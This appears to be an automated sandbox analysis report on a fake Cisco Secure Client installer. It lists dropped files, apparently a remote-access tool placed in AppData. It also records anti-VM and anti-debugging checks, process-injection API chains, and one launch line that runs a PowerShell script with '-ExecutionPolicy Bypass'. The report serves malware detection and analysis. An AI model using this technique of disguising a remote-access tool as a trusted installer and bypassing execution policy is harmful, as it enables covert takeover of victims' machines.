                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-P9NEN.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\is-VTFF8.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-URJD8.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D0HIO.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q7D23.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\_isetup\_setup64.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-SINFC.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-1KC0P.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-5J2U6.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OJMRD.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1N4FB.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2J155.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-VTDA9.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-8OL4N.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3NCDE.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MMI8M.tmp
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exe
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-T9GPQ.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RDO3H.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-50H6H.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-H5812.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2TJID.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OTMTE.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q2D0Q.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UM1NO.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-V8S0O.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VFI6.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MGVA1.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-53P9C.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S9VDU.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MKOUV.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S996S.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D2T5K.tmp
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Evaded block: after key decision graph_6-102599
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Evaded block: after key decision graph_6-105594
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Evaded block: after key decision graph_6-105818
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Evaded block: after key decision graph_6-105976
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Evaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_6-102542
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe API coverage: 5.6 %
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe API coverage: 3.0 %
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 6_2_68904F30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6528 Thread sleep time: -8301034833169293s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 4856 Thread sleep time: -64000s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 4948 Thread sleep time: -43600s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 4856 Thread sleep time: -2000000s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Last function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68903130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 68903226h6_2_68903130
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,6_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,6_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102D059 PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D059
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102CEB1 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CEB1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,9_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,9_2_110BC3D0
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                  Source: client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMware
                                  Source: client32.exe, 00000006.00000002.4598399799.0000000005196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{
                                  Source: client32.exe, 00000009.00000003.2496832834.0000000000540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
                                  Source: client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: client32.exe, 00000006.00000002.4598399799.0000000005196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMWare
                                  Source: client32.exe, 00000006.00000002.4584818110.000000000048E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                  Source: client32.exe, 0000000A.00000002.2578179566.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.2577187485.00000000005DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                                  Source: CiscoSetup.tmp, 00000002.00000003.2541285182.00000000010C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
                                  Source: powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lP
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe API call chain: ExitProcess graph end node graph_6-105369
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe API call chain: ExitProcess graph end node graph_6-105491
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe API call chain: ExitProcess graph end node
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110CFCF0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,6_2_110CFCF0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11178A14 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_11178A14
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11030B10 SetUnhandledExceptionFilter,6_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_1115E4D1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689128E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_689128E1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_689187F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_689187F5
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68B40807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_68B40807
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11030B10 SetUnhandledExceptionFilter,9_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1115E4D1

                                  HIPS / PFW / Operating System Protection Evasion

                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,6_2_110F2280
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1110F410 GetKeyState,DeviceIoControl,keybd_event,6_2_1110F410
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,6_2_1109DC20
                                  Source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                  Source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: client32.exe, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Progman
Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
